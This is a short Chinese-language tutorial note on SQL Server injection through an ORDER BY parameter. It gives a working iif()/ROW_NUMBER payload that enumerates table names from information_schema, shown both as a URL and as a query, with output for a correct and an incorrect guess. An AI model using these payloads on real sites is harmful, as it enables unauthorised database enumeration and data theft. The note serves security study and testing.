0x01 前言
与普通注入无异,记一下语法即可
类似的更详细一些的文章:https://www.yuque.com/pmiaowu/web_security_1/ksym0w
0x01 基本数据
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x02 猜表名
注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段
修改 LEFT() 函数 第二个参数可以控制出来得数据
查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?orderby=id-iif((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)like’%article%’,1,’x’)
数据库语句: SELECT * from article order by id-iif((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)like’%article%’,1,’x’) desc
# 查询当前库 表一名称
# 对的情况
1> SELECT
*
FROM
article
ORDER BY
id - iif (
(
SELECT
table_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 1
) LIKE '%article%',
1,
'x'
) DESC;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 2 | 测试标题2 | 测试内容2 |
| 1 | 测试标题 | 测试内容 |
+----+-----------+-----------+
(2 rows affected)
# 错误的情况
1> SELECT
*
FROM
article
ORDER BY
id - iif (
(
SELECT
table_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 1
) LIKE '%aaaaaaaaaaa%',
1,
'x'
) DESC;
2> go
22018 - [SQL Server]在将 varchar 值 'x' 转换成数据类型 int 时失败。